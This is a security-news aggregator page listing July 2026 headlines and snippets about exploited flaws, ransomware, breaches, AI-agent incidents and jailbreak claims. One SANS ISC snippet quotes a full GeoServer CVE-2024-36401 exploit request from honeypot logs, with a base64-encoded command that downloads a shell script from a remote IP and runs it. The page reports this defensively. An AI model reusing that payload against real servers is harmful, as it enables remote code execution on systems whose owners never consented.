no alarms and no surprises please..
-
‘Confused Deputy’ Flaws Persist in Google Cloud, Microsoft Azure
‘Confused Deputy’ Flaws Persist in Google Cloud, Microsoft Azure This category of vulnerabilities allows an attacker to easily acquire administrative level permissions and bypass cloud providers’ access controls. Rob Wright Go to gbhackers.com
-
FBI: Breaking Affiliate Trust Sped Along LockBit’s Takedown
FBI: Breaking Affiliate Trust Sped Along LockBit’s Takedown An FBI agent explains how the mulitnational law-enforcement Operation Cronos was successful in disrupting the largest ransomware group of its time. Elizabeth Montalbano Go to gbhackers.com
-
Adversaries Don’t Need a Zero-Day — They Read Your Rulebook
Adversaries Don’t Need a Zero-Day — They Read Your Rulebook Confidence in autonomous security tools is declining, and here’s why. Burak Oktenli Go to gbhackers.com
-
Over 70 Fake Windows App Sites Could Turn Trusted Downloads Into Malware
Over 70 Fake Windows App Sites Could Turn Trusted Downloads Into Malware A newly uncovered cluster of more than 70 impersonation domains targeting popular Windows applications is raising fresh concerns about a scalable malware distribution campaign… Delivered by PolitePaul service Go to gbhackers.com
-
GitHub Adds Dependabot Cooldown to Stop Poisoned Dependencies
GitHub Adds Dependabot Cooldown to Stop Poisoned Dependencies GitHub has introduced a default cooldown period for Dependabot version updates to decrease the risk of organizations automatically adopting malicious or compromised open-source dependencies… Delivered by PolitePaul service Go to gbhackers.com
-
Crypto Criminals Use Social Media Profiling to Select Victims for Violent Wrench Attacks
Crypto Criminals Use Social Media Profiling to Select Victims for Violent Wrench Attacks Crypto criminals are increasingly weaponizing social media intelligence to identify and target high-value individuals in a surge of violent “wrench attacks,” marking a shift… Delivered by PolitePaul service Go to gbhackers.com
-
Iranian Hackers Exploit Rockwell, Schneider and Siemens PLCs Across U.S. Critical Infrastructure
Iranian Hackers Exploit Rockwell, Schneider and Siemens PLCs Across U.S. Critical Infrastructure Iranian-affiliated advanced persistent threat (APT) actors are actively exploiting internet-connected programmable logic controllers (PLCs) from major industrial vendors, including Rockwell Automation, Schneider Electric, and… Delivered by PolitePaul service Go to gbhackers.com
-
Windows WalletService Flaw Lets Standard Users Gain SYSTEM Privileges
Windows WalletService Flaw Lets Standard Users Gain SYSTEM Privileges Microsoft Windows WalletService is affected by a local privilege escalation vulnerability tracked as CVE-2026-49176. This flaw could allow a standard authenticated user to obtain… Delivered by PolitePaul service Go to gbhackers.com
-
GitHub, PyPI add time-based defenses against supply chain attacks
GitHub, PyPI add time-based defenses against supply chain attacks GitHub and PyPI (Python Package Index) have introduced a time-based mechanism in the Dependabot dependency management tool to protect against supply-chain attacks and to limit their impact. […] Bill Toulas Go to bleepingcomputer
-
SparkKitty Malware Steals Crypto Wallet Seed Phrases From iOS and Android Photos
SparkKitty Malware Steals Crypto Wallet Seed Phrases From iOS and Android Photos A new mobile threat is quietly targeting cryptocurrency users by reading the photos stored on their phones. Known as SparkKitty, this malware works on both iOS and Android devices and focuses on stealing wallet seed phrases hidden inside screenshots and gallery images. Instead…
-
Windows 11’s File Explorer Is Now Faster at Deleting Large Files
Windows 11’s File Explorer Is Now Faster at Deleting Large Files Microsoft is rolling out a targeted performance update for Windows 11 designed to resolve one of the platform’s most persistent storage annoyances: sluggish deletion of large, highly fragmented files. The improvement is part of a broader set of File Explorer refinements currently undergoing testing…
-
Ransomware Gangs Attack Palo Alto, Fortinet, Citrix, and Check Point VPNs to Target Corporate Networks
Ransomware Gangs Attack Palo Alto, Fortinet, Citrix, and Check Point VPNs to Target Corporate Networks A coordinated wave of exploitation targeting edge VPN and firewall appliances from four major vendors Palo Alto Networks, Fortinet, Citrix, and Check Point has emerged as the dominant initial-access vector for ransomware operators in mid-2026. Threat actors, including affiliates of…
-
BlueNoroff Hijacks Trusted Telegram Accounts to Deliver ClickFix Malware Through Fake Zoom Calls
BlueNoroff Hijacks Trusted Telegram Accounts to Deliver ClickFix Malware Through Fake Zoom Calls A North Korean hacking unit has refined a scheme that turns everyday chats into malware traps. The BlueNoroff group, linked to the wider Lazarus ecosystem, is taking over real Telegram accounts that belong to trusted industry contacts. Those stolen identities then send…
-
PyPI Blocks New File Uploads on 14-Day-Old Releases to Prevent Package Poisoning Attacks
PyPI Blocks New File Uploads on 14-Day-Old Releases to Prevent Package Poisoning Attacks PyPI has introduced a new security measure that prevents users from uploading new files to package releases that are more than 14 days old. This change aims to stop attackers from adding malicious files to trusted Python package versions after compromising a…
-
ISC Stormcast For Monday, July 27th, 2026 https://isc.sans.edu/podcastdetail/10024, (Mon, Jul 27th)
ISC Stormcast For Monday, July 27th, 2026 https://isc.sans.edu/podcastdetail/10024, (Mon, Jul 27th) (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Go to isc.sans.edu
-
Scans for ESAFENET CDG 3 Document Management System Weak Logins, (Sun, Jul 26th)
Scans for ESAFENET CDG 3 Document Management System Weak Logins, (Sun, Jul 26th) ESAFENET’s CDG showed up in our data before. The company focused on secure document management and data leakage prevention solutions. The “CDG” stands for “Content Data Guard”, and the product appears to be mostly targeting the Chinese market [1]. Sadly, like so…
-
Weekly Update 514: This Week in Data Breaches
Weekly Update 514: This Week in Data Breaches The Origin Energy breach down here in Aus is all over the news this week, and as with many breaches, it’s multi-faceted. You’ve got them leading with “don’t worry, your credit card is fine”, the hacker leading with “they didn’t respond when I tried to report it”,…
-
Steam forum ClickFix attacks infect gamers with XMRig cryptominers
Steam forum ClickFix attacks infect gamers with XMRig cryptominers Steam discussion forums are being abused in ClickFix attacks that pretend to be fixes for game and computer problems but actually infect devices with cryptominers. […] Lawrence Abrams Go to bleepingcomputer
-
Malicious sites use JavaScript to build malware in browser memory
Malicious sites use JavaScript to build malware in browser memory A massive malvertising campaign is using fake Solana, Luno, and TradingView webpages with malicious JavaScript that instructs browsers to assemble malware directly in memory. […] Bill Toulas Go to bleepingcomputer
-
ShinyHunters data leaks fuel $2,000 sextortion email scam
ShinyHunters data leaks fuel $2,000 sextortion email scam Threat actors are using email addresses exposed in data breaches leaked by the ShinyHunters extortion group to send sextortion emails demanding $2,000 in Bitcoin. […] Lawrence Abrams Go to bleepingcomputer
-
Top 10 Best Active Directory Management Tools 2026
Top 10 Best Active Directory Management Tools 2026 Managing Active Directory with native tools alone can become time-consuming as an organization grows. Routine tasks such as provisioning users, resetting passwords, managing group memberships, auditing permissions, and maintaining compliance can place a heavy burden on IT teams. Manual processes also increase the risk of configuration errors,…
-
PentesterFlow – AI Tool for Penetration Testers and Bug Hunters to Automate Workflows
PentesterFlow – AI Tool for Penetration Testers and Bug Hunters to Automate Workflows PentesterFlow is a new open-source, human-in-the-loop agentic AI command-line tool built specifically for penetration testers and bug bounty hunters, designed to automate recon-to-reporting workflows without sacrificing analyst oversight. Most agentic AI security tools suffer from hallucinated findings, weak context retention, and poor…
-
GitLab Vulnerabilities Allow Attackers to Execute Remote Code on Default GitLab Installations
GitLab Vulnerabilities Allow Attackers to Execute Remote Code on Default GitLab Installations A newly disclosed exploit chain in GitLab shows how two long-buried memory-safety flaws in a Ruby JSON parsing library, Oj, could be combined to achieve remote code execution on default GitLab installations, exposing source code, Rails secrets, and internal services. As part of…
-
Researcher Claims Working Jailbreak on Top AI Models Including GPT-5.6, Claude Opus 5, and Fable
Researcher Claims Working Jailbreak on Top AI Models Including GPT-5.6, Claude Opus 5, and Fable A well-known AI red teamer claims to have developed a universal jailbreak that works against leading large language models, including heavily guarded flagships such as GPT-5.6 Sol, Claude Opus 5, and Fable. In a public post on X, Pliny the…
-
10 Best ZTNA Solutions (Zero Trust Network Access) In 2026
10 Best ZTNA Solutions (Zero Trust Network Access) In 2026 Zero Trust Network Access (ZTNA) anchors 2026 cybersecurity amid remote, cloud, and hybrid booms. ZTNA solutions aren’t hype—they’re vital for data locks, compliance wins, and borderless teams. “Never trust, always verify”: ZTNA okays only vetted users/devices, location-blind. Shrink attack planes, block lateral creeps, master app…
-
Malvertising Sends Malware in Pieces, Then Makes the Browser Build the Executable
Malvertising Sends Malware in Pieces, Then Makes the Browser Build the Executable A malvertising operation dubbed SourTrade is making victims’ browsers build the final Windows executable themselves, using a legitimate Bun runtime as its base instead of serving one complete malicious file from a fixed URL. Confiant, which detailed the campaign on July 23, 2026,…
-
Fastjson 1.x RCE Vulnerability Targeted in Attacks With No Patched Available
Fastjson 1.x RCE Vulnerability Targeted in Attacks With No Patched Available Security firms ThreatBook and Imperva say attackers are targeting a critical flaw in Fastjson, Alibaba’s JSON library for Java. In affected Spring Boot applications, a malicious JSON request can execute code without authentication, with the privileges of the Java process. Tracked as CVE-2026-16723, the…
-
Researcher Publishes GitLab RCE PoC Letting Authenticated Users Run Commands as Git
Researcher Publishes GitLab RCE PoC Letting Authenticated Users Run Commands as Git Security researchers at depthfirst published working exploit code on July 24 for a GitLab flaw that GitLab patched six weeks earlier, on June 10. It runs commands as git on any self-managed 18.11.3 server that has not taken the update. Any authenticated user who…
-
CTM360 Research Reveals How Insurance Phishing Has Evolved Into Real-Time Account Hijacking
CTM360 Research Reveals How Insurance Phishing Has Evolved Into Real-Time Account Hijacking For years, phishing campaigns targeting financial institutions followed the same playbook. Victims were tricked into entering usernames and passwords, attackers collected the credentials, and accounts were compromised later when an opportunity arose. That model is changing. Recent investigations into insurance-focused phishing operations reveal…
-
Cl0p Affiliates Target Internet-Exposed PTC Windchill and FlexPLM with Unauthenticated RCE
Cl0p Affiliates Target Internet-Exposed PTC Windchill and FlexPLM with Unauthenticated RCE Threat actors linked to the Cl0p (aka Chubby Scorpius, FIN11, Graceful Spider, and Lace Tempest) ransomware campaign are exploiting flaws in internet-exposed PTC Windmill and FlexPLM deployments as part of a new data extortion campaign. “Attackers chain a pre-authentication information disclosure in the FlexPLM…
-
Hackers Use Stealer Logs to Bypass MFA and Launch Ransomware Attacks
Hackers Use Stealer Logs to Bypass MFA and Launch Ransomware Attacks Infostealer malware has now become the invisible thread linking petty credential theft to full-blown ransomware campaigns. Attackers no longer bother forcing their way through… Delivered by PolitePaul service Go to gbhackers.com
-
Google Launches Unified Cryptonym-Based Naming System for Threat Actors
Google Launches Unified Cryptonym-Based Naming System for Threat Actors Google Threat Intelligence Group (GTIG) has introduced a unified cryptonym-based naming system for cyber threat actors, aiming to simplify attribution, improve analyst workflows, and… Delivered by PolitePaul service Go to gbhackers.com
-
Phantom Stealer Campaign Uses JavaScript and PowerShell to Steal Browser Credentials
Phantom Stealer Campaign Uses JavaScript and PowerShell to Steal Browser Credentials A sophisticated phishing campaign that disguises malware delivery inside routine business communications, ultimately deploying Phantom Stealer v3.5.0 to harvest browser credentials, cookies, payment data,… Delivered by PolitePaul service Go to gbhackers.com
-
Hackers Exploit Industrial PLCs and Manipulate HMI Displays to Hide Attacks
Hackers Exploit Industrial PLCs and Manipulate HMI Displays to Hide Attacks Six federal agencies have updated a joint advisory warning that Iranian-affiliated advanced persistent threat (APT) actors are actively exploiting internet-exposed programmable logic controllers (PLCs)… Delivered by PolitePaul service Go to gbhackers.com
-
OpenAI confirms ChatGPT is down worldwide
OpenAI confirms ChatGPT is down worldwide ChatGPT, the famous artificial intelligence chatbot that allows users to converse with various personalities and topics, has connectivity issues worldwide. […] Mayank Parmar Go to bleepingcomputer
-
OnTrac notifies customers of data breach after network hack
OnTrac notifies customers of data breach after network hack OnTrac parcel delivery company is informing that hackers breached its corporate network and may have accessed personal details belonging to its customers. […] Bill Toulas Go to bleepingcomputer
-
Hermes AI agent used to automate attack on Thai Finance Ministry
Hermes AI agent used to automate attack on Thai Finance Ministry A threat actor used the open-source Hermes AI agent in unattended “YOLO” mode to automate post-exploitation activity during an alleged breach of Thailand’s Ministry of Finance. […] Lawrence Abrams Go to bleepingcomputer
-
Hackers hijack hotel Wi-Fi DNS to steal Microsoft 365 accounts
Hackers hijack hotel Wi-Fi DNS to steal Microsoft 365 accounts Hackers are changing the DNS settings on Wi-Fi devices at hotels and conference centers to redirect users to fake Microsoft 365 login pages. […] Bill Toulas Go to bleepingcomputer
-
Microsoft blames massive Microsoft 365 outage on maintenance bug
Microsoft blames massive Microsoft 365 outage on maintenance bug Microsoft says a bug in its automated network maintenance request system caused Thursday’s massive outage by mistakenly removing IP routes from more devices than intended, disrupting Azure and Microsoft 365 services. […] Lawrence Abrams Go to bleepingcomputer
-
Foxit Updater Vulnerability Gives Standard Users SYSTEM-Level Control of Windows Devices
Foxit Updater Vulnerability Gives Standard Users SYSTEM-Level Control of Windows Devices Foxit PDF Reader has been found vulnerable to a local privilege escalation flaw that allows standard Windows users to gain full SYSTEM-level control under specific conditions. The issue, tracked as CVE-2026-57239, was disclosed following research into Foxit’s updater and service architecture and represents a…
-
Tego AI Discloses Second Claude Flaw in a Week: Hidden Link Silently Sends Files to Attackers
Tego AI Discloses Second Claude Flaw in a Week: Hidden Link Silently Sends Files to Attackers Tel Aviv, Israel, July 24th, 2026, CyberNewswire One week after disclosing that Anthropic’s Claude Tag Slack integration could be driven by plain “@Claude” text, Tego AI today published a second piece of research on the Claude ecosystem. This one…
-
Certighost Active Directory CS Exploit Allows Low-Privileged Users to Compromise Domain
Certighost Active Directory CS Exploit Allows Low-Privileged Users to Compromise Domain A newly disclosed Active Directory Certificate Services (AD CS) vulnerability, dubbed Certighost, allowed a low-privilege domain user to impersonate a Domain Controller and take over an entire Active Directory domain. Tracked as CVE-2026-54121, the flaw was patched in Microsoft’s July 2026 security updates following…
-
Bing Images Vulnerability Lets Attackers Execute Remote Code on Microsoft Servers
Bing Images Vulnerability Lets Attackers Execute Remote Code on Microsoft Servers Three critical remote code execution (RCE) vulnerabilities in Microsoft’s infrastructure, with two flaws in Bing Images allowing attackers to hijack backend image-processing servers using nothing more than a crafted SVG file. The findings, disclosed responsibly by XBOW and now patched, expose how an “ordinary”…
-
Cl0p Hackers Exploit Windchill Servers to Steal Companies’ Secret Product Designs
Cl0p Hackers Exploit Windchill Servers to Steal Companies’ Secret Product Designs Cl0p ransomware affiliates are exploiting exposed PTC Windchill and FlexPLM servers to steal engineering and product-design data. The campaign combines software flaws to gain access without credentials, install hidden server-side access, and remove sensitive files before demanding payment. The activity places manufacturers, automotive firms,…
-
BlueNoroff Zoom Phishing Kit Profiles Crypto Wallets Before Malware Delivery
BlueNoroff Zoom Phishing Kit Profiles Crypto Wallets Before Malware Delivery The North Korean threat actors behind the ClickFix-style campaigns that employ typosquatted Zoom and Microsoft Teams domains have been found to operate an active phishing kit to impersonate the videoconferencing platforms in social engineering campaigns designed to deliver malware. “BlueNoroff has operationalised trust abuse by…
-
Certighost Exploit Lets Low-Privileged Active Directory Users Impersonate a Domain Controller
Certighost Exploit Lets Low-Privileged Active Directory Users Impersonate a Domain Controller Researchers H0j3n and Aniq Fakhrul published a working exploit on July 24 that lets a low-privileged Active Directory user obtain a certificate for a Domain Controller and authenticate as that machine. They codenamed the flaw Certighost. Because Domain Controller accounts carry directory replication rights,…
-
ChatGPT AgentForger Flaw Could Deploy Rogue Workspace Agents via a Phishing Link
ChatGPT AgentForger Flaw Could Deploy Rogue Workspace Agents via a Phishing Link Cybersecurity researchers have disclosed a critical vulnerability in OpenAI’s ChatGPT Workspace Agents that could have allowed a single phishing link to stealthily build, authorize, and deploy an autonomous artificial intelligence (AI) agent inside a victim’s organization. The vulnerability has been codenamed AgentForger by…
-
Bing Images Flaws Let Crafted SVGs Run Commands as SYSTEM on Microsoft’s Servers
Bing Images Flaws Let Crafted SVGs Run Commands as SYSTEM on Microsoft’s Servers A crafted SVG submitted to Bing’s image search ran commands as NT AUTHORITYSYSTEM on Microsoft’s production image-processing workers, and as root on the Linux machines in the same fleet. XBOW’s testing got the same result on workers across different hosts and network…
-
Seeing AI Agents Is Not Enough. Security Teams Must Enforce What They Can Do
Seeing AI Agents Is Not Enough. Security Teams Must Enforce What They Can Do AI agent security is moving through a familiar maturity curve: adoption, then visibility, and finally, control. But what we’ve collectively discovered is that enforcing least privilege for AI agents is harder than we ever imagined. This is why there are so…
-
Friday Squid Blogging: Illex Squid Catch in the Falklands
Friday Squid Blogging: Illex Squid Catch in the Falklands Lower catch this year. As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered. Blog moderation policy. Bruce Schneier Go to bruce schneier
-
Why AI Needs a “Genie Coefficient”
Why AI Needs a “Genie Coefficient” This essay was written with Barath Raghavan, and originally appeared in IEEE Spectrum. Major benchmarks measure what AI can do. None measure whether it does what you mean: the distance between what you ask an AI to do and the unspoken assumptions about how you want the AI to…
-
ISC Stormcast For Friday, July 24th, 2026 https://isc.sans.edu/podcastdetail/10022, (Fri, Jul 24th)
ISC Stormcast For Friday, July 24th, 2026 https://isc.sans.edu/podcastdetail/10022, (Fri, Jul 24th) (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Go to isc.sans.edu
-
When the “Autonomous Attacker” Is Your Own AI Model, (Thu, Jul 23rd)
When the “Autonomous Attacker” Is Your Own AI Model, (Thu, Jul 23rd) Two disclosures, five days apart, described the same intrusion from opposite ends — one from the victim, one from the party that turned out to be responsible — and together they make one of the more instructive incidents of the year for defenders.…
-
ISC Stormcast For Thursday, July 23rd, 2026 https://isc.sans.edu/podcastdetail/10020, (Thu, Jul 23rd)
ISC Stormcast For Thursday, July 23rd, 2026 https://isc.sans.edu/podcastdetail/10020, (Thu, Jul 23rd) (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Go to isc.sans.edu
-
Rondo Meets Geoserver, (Wed, Jul 22nd)
Rondo Meets Geoserver, (Wed, Jul 22nd) This isn’t a new attack, but something I saw “pop-up” in our logs this week: GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),%27bash%20-c%20%7Becho%2CKHdnZXQgLXFPLSBodHRwOi8vNDUuMTUzLjM0LjE1My9yb25kby5gYHp5dC5zaHx8YnVzeWJveCB3Z2V0IC1xTy0gaHR0cDovLzQ1LjE1My4zNC4xNTMvcm9uZG8uYGB6eXQuc2h8fGN1cmwgLXMgaHR0cDovLzQ1LjE1My4zNC4xNTMvcm9uZG8uYGB6eXQuc2gpfHNo%7D%7C%7Bbase64%2C-d%7D%7Csh%27) HTTP/1.1 Host: [redeacted]:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: */* This attack is associated with CVE-2024-36401, an X-Path expression evaluation issue in Geoserver. Geoserver is a…
-
CISOs vs. Boards: Myth or Misunderstanding?
CISOs vs. Boards: Myth or Misunderstanding? Escalating threats are forcing boards to prioritize security, but communication gaps persist. Boards and security teams each say they need more support to bridge the divide. Arielle Waldman Go to gbhackers.com
-
Escape Artists: ‘Incorrigible’ AI Models Resist Rehabilitation
Escape Artists: ‘Incorrigible’ AI Models Resist Rehabilitation The hacking of Hugging Face by a rogue OpenAI agent is significant, but unsurprising — and preventing the next AI model escape will be difficult, at best. Robert Lemos Go to gbhackers.com
-
Vatican’s Official Prayer App Leaks 700K+ Global Users’ PII
Vatican’s Official Prayer App Leaks 700K+ Global Users’ PII A porous API endpoint exposes, names, email addresses, location, and site status, all of which can be easily gleaned by anyone with a browser. Nate Nelson Go to gbhackers.com
-
Golden Chickens Launches Four Modular Malware Families to Steal Chrome Credentials and Hijack Browser Sessions
Golden Chickens Launches Four Modular Malware Families to Steal Chrome Credentials and Hijack Browser Sessions Golden Chickens, tracked as TAG-195 and also known as Venom Spider, has launched four new modular malware families designed to enhance credential theft, browser… Delivered by PolitePaul service Go to gbhackers.com
-
SourTrade Browser-Assembled Malware Defeats Hash-Based Detection by Design
SourTrade Browser-Assembled Malware Defeats Hash-Based Detection by Design SourTrade turns the browser itself into a malware build system, deliberately sidestepping the industry’s reliance on hash-based file fingerprints and traditional network-centric detection. SourTrade has… Delivered by PolitePaul service Go to gbhackers.com
-
JetBrains Patches Multiple Vulnerabilities Affecting IntelliJ IDEA and TeamCity
JetBrains Patches Multiple Vulnerabilities Affecting IntelliJ IDEA and TeamCity JetBrains has addressed a series of security vulnerabilities affecting IntelliJ IDEA and TeamCity, including several critical flaws that could allow code execution or unauthorized… Delivered by PolitePaul service Go to gbhackers.com
-
Australian Energy Giant Origin Confirms Data Breach Exposes Customer Data
Australian Energy Giant Origin Confirms Data Breach Exposes Customer Data Origin Energy Limited has confirmed a cybersecurity incident involving unauthorized access to and disclosure of customer data, representing a significant data security event for… Delivered by PolitePaul service Go to gbhackers.com
-
Apache Syncope Flaws Let Users Gain Admin Roles and Execute Remote Code
Apache Syncope Flaws Let Users Gain Admin Roles and Execute Remote Code Apache Syncope has released versions 4.1.24.1, 4.1.24.1.2, and 4.0.74.0.7 to address six security vulnerabilities affecting the 4.1, 4.0, and 3.0 release branches. These vulnerabilities… Delivered by PolitePaul service Go to gbhackers.com
-
Clop ransomware targets Windchill, FlexPLM in data theft attacks
Clop ransomware targets Windchill, FlexPLM in data theft attacks The Clop ransomware gang (also tracked as Cl0p) is targeting Internet-exposed PTC Windchill and FlexPLM instances in a new data theft extortion campaign. […] Sergiu Gatlan Go to bleepingcomputer
-
New Dolphin X malware uses AI to rank high-value targets
New Dolphin X malware uses AI to rank high-value targets A new Dolphin X remote access trojan claims to use an AI-powered profiling feature to score and rank infected users, helping cybercriminals identify which victims should be targeted first. […] Lawrence Abrams Go to bleepingcomputer
-
Australian energy provider Origin says data breach exposes client data
Australian energy provider Origin says data breach exposes client data Origin Energy has confirmed that an unauthorized party accessed and subsequently leaked customer data online, exposing sensitive personally identifiable information (PII), among others. […] Bill Toulas Go to bleepingcomputer
-
Fake Claude app promoted by Bing ads pushes SectopRAT malware
Fake Claude app promoted by Bing ads pushes SectopRAT malware A malvertising campaign on the Bing search service is pushing a fake Claude desktop app installer hosted on a legitimate Claude.ai domain to deliver the SectopRAT malware. […] Bill Toulas Go to bleepingcomputer
-
Russian hackers exploit Zimbra zero-click flaw for email theft
Russian hackers exploit Zimbra zero-click flaw for email theft CISA is warning that the Russian state-sponsored hacking group Laundry Bear, also known as Void Blizzard, is targeting organizations using Zimbra Collaboration email servers by combining phishing attacks with the exploitation of a now-patched Zimbra vulnerability. […] Lawrence Abrams Go to bleepingcomputer
-
One Compromised Wi-Fi Gateway Can Redirect Every Hotel Guest to Attacker Controlled Servers
One Compromised Wi-Fi Gateway Can Redirect Every Hotel Guest to Attacker Controlled Servers One compromised hotel Wi-Fi gateway can silently redirect every guest to attacker controlled servers, putting corporate accounts at risk even when users think they are browsing safely. The campaign starts with a simple idea that many travelers overlook. When you connect to…
-
How Infostealer Logs Became the Fuel Behind Massive Cloud Data Breaches
How Infostealer Logs Became the Fuel Behind Massive Cloud Data Breaches Infostealer malware has quietly become the single most important initial-access commodity in the cybercrime economy, replacing traditional phishing and exploit-driven intrusions as the leading precursor to enterprise breaches and ransomware. Rather than breaking into networks, modern threat actors buy their way in by purchasing…
-
Google Rolls Out Emergency Chrome Update for Four High-Severity Security Flaws
Google Rolls Out Emergency Chrome Update for Four High-Severity Security Flaws Google has released an emergency security update for its Chrome browser, addressing four high-severity vulnerabilities that could expose users to serious risks if left unpatched. The update, now rolling out globally, upgrades Chrome to version 150.0.7871.186/.187 for Windows and macOS, and 150.0.7871.186 for Linux…
-
Hackers Hide 750MB Lampion RAT Inside Fake Payment Receipt Emails
Hackers Hide 750MB Lampion RAT Inside Fake Payment Receipt Emails Hackers are using fake payment receipt emails to deliver a 750MB Lampion remote access trojan to targets in Portugal. The campaign relies on familiar financial language, convincing business details, and oversized files designed to slow down analysis and evade security checks. The attack begins with…
-
Microsoft Detects 7.6 Billion Email Phishing Threats as Teams Vishing Attacks Increases 10-Fold
Microsoft Detects 7.6 Billion Email Phishing Threats as Teams Vishing Attacks Increases 10-Fold Email phishing remains one of the most common ways attackers gain access to business accounts. During the second quarter of 2026, criminals continued to use fake login pages, malicious attachments, and convincing business messages to steal credentials or deliver malware. The problem…
-
Europe’s Multilingual Reality Exposes AI Security Gaps
Europe’s Multilingual Reality Exposes AI Security Gaps The AI security layer and guardrails for many AI products don’t evenly protect against jailbreaking and unsafe actions in every single language. Alexander Culafi Go to gbhackers.com
-
Fake Notepad++ Plugin Delivers MATCHBOIL.V2 in UAC-0099 Attacks
Fake Notepad++ Plugin Delivers MATCHBOIL.V2 in UAC-0099 Attacks The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of a new campaign that involves the use of a malicious program that’s dressed up as a Notepad++ plugin to compromise Windows systems. The activity has been attributed by the agency to a threat cluster it tracks…
-
Russian Espionage Group Exploited Zimbra Zero-Day to Steal Mail and 2FA Codes
Russian Espionage Group Exploited Zimbra Zero-Day to Steal Mail and 2FA Codes A Russian state-supported espionage group spent months reading Western mailboxes through a then-unknown flaw in Zimbra’s webmail client. The payload goes after the last 90 days of email, the organization’s entire email directory, the password saved in the browser and the codes kept…
-
ThreatsDay: Android Spyware, PLC Attacks, AI Image Prompt Injection + 12 More Stories
ThreatsDay: Android Spyware, PLC Attacks, AI Image Prompt Injection + 12 More Stories Most of this week’s trouble came dressed as something useful. A package stole data. A fake extension opened remote access. A safety app became spyware. An image gave hidden orders to an AI agent. Other threats hid in open systems, weak code,…
-
Claude Cowork Flaw Could Let AI Agent Escape Its VM and Access Mac Files
Claude Cowork Flaw Could Let AI Agent Escape Its VM and Access Mac Files Cybersecurity researchers have uncovered a sandbox escape vulnerability in Anthropic’s Claude Cowork that makes it possible to break out of the confines of a Linux virtual machine (VM) within which the agent runs to read or write files anywhere on the…
-
Chaos Ransomware Uses msaRAT to Route C2 Traffic Through Headless Chrome and Edge
Chaos Ransomware Uses msaRAT to Route C2 Traffic Through Headless Chrome and Edge The Chaos ransomware group ran its command-and-control through the victim’s own browser. Cisco Talos on Thursday detailed msaRAT, the Rust implant behind it, found on a compromised Windows machine ahead of the encryptor. The implant never opens an outbound connection of its…
-
When the attacker is an AI agent
When the attacker is an AI agent Lessons from the OpenAI-Hugging Face breach Categories: Security Operations Tags: AI, OpenAI, Hugging Face Go to sophos
-
End-to-End Encryption and “Going Dark”
End-to-End Encryption and “Going Dark” New paper: “Encryption and Globalization 15 Years Later: End-to-End Encryption and the Third Round of the ‘Going Dark’ Debate“: Abstract: This Article updates and expands on 2012 research on encryption and globalization, analyzing what the authors call “Round 3” of the Going Dark Debate: the current controversies over end-to-end encryption…
-
OpenAI’s AI “goes rogue” and hacks Hugging Face: what you need to know
OpenAI’s AI “goes rogue” and hacks Hugging Face: what you need to know You can’t have failed to hear the news headlines about “rogue” OpenAI models hacking into another AI organisation, Hugging Face. But what has actually happened, who is to blame, and is it as serious as some of the reports suggest? Find out…
-
Russian Hackers Exploit Zimbra Zero-Day Against US, Ukraine Targets
Russian Hackers Exploit Zimbra Zero-Day Against US, Ukraine Targets A state-sponsored threat group, dubbed “Laundry Bear,” sends “half-click” phishing emails that require a victim only to open or preview the message. Rob Wright Go to gbhackers.com
-
Agentic AI Challenges Progress in Confidential Computing
Agentic AI Challenges Progress in Confidential Computing Core issues that slowed down adoption of secure data vaults are being resolved by technology, but artificial intelligence poses new ones. Experts have some answers. Agam Shah Go to gbhackers.com
-
New Windows Stealer Uses AI Profiling to Identify High-Value Corporate Victims
New Windows Stealer Uses AI Profiling to Identify High-Value Corporate Victims A new Windows-focused infostealer and remote access trojan (RAT) dubbed Dolphin X is being advertised on cybercrime forums with a clear pitch: automate the… Delivered by PolitePaul service Go to gbhackers.com
-
Critical Check Point SmartConsole Flaw Exploited in the Wild to Bypass Authentication
Critical Check Point SmartConsole Flaw Exploited in the Wild to Bypass Authentication A critical authentication bypass vulnerability affecting Check Point SmartConsole has been actively exploited in the wild, allowing attackers to gain unauthorized access to security… Delivered by PolitePaul service Go to gbhackers.com
-
Ubuntu Snap-Confine Vulnerability Allows Unprivileged Users to Execute Code as Root
Ubuntu Snap-Confine Vulnerability Allows Unprivileged Users to Execute Code as Root A recently disclosed vulnerability in Ubuntu’s snap ecosystem, identified as CVE-2026-8933, presents a critical local privilege escalation flaw. This vulnerability allows unprivileged users to… Delivered by PolitePaul service Go to gbhackers.com
-
Microsoft Adds Prompt Injection Protection to Defender for Office 365
Microsoft Adds Prompt Injection Protection to Defender for Office 365 Microsoft has introduced prompt injection protection in Defender for Office 365, representing a significant advancement in securing enterprise email environments against emerging AI-targeted threats…. Delivered by PolitePaul service Go to gbhackers.com
-
KARR Bluetooth Vulnerability Lets Nearby Attackers Unlock and Immobilize Over 2 Million Cars
KARR Bluetooth Vulnerability Lets Nearby Attackers Unlock and Immobilize Over 2 Million Cars A critical Bluetooth vulnerability in dealer-installed KARR Security Systems is putting over 2 million vehicles at risk of unauthorized access and immobilization. This situation… Delivered by PolitePaul service Go to gbhackers.com
-
New msaRAT malware uses Chrome, Edge browsers to route C2 traffic
New msaRAT malware uses Chrome, Edge browsers to route C2 traffic The Chaos ransomware gang is using a new backdoor dubbed msaRAT that hides command-and-control (C2) communication by routing it through the Chrome or Edge browsers. […] Bill Toulas Go to bleepingcomputer
-
Microsoft working to fix Exchange Online mailbox quarantine issue
Microsoft working to fix Exchange Online mailbox quarantine issue Microsoft is working to resolve an ongoing Exchange Online issue that has been mistakenly quarantining customers’ mailboxes since Sunday. […] Sergiu Gatlan Go to bleepingcomputer
-
Check Point warns of SmartConsole zero-day exploited in attacks
Check Point warns of SmartConsole zero-day exploited in attacks Israeli cybersecurity firm Check Point Software has addressed an actively exploited zero-day flaw in the company’s SmartConsole graphical user interface (GUI) admin panel. […] Sergiu Gatlan Go to bleepingcomputer
-
Upbound says hack caused $13 million in fraudulent Acima leases
Upbound says hack caused $13 million in fraudulent Acima leases The Upbound Group fintech company disclosed that threat actors who stole data from its systems leveraged it to create $13 million in Acima leases. […] Bill Toulas Go to bleepingcomputer
-
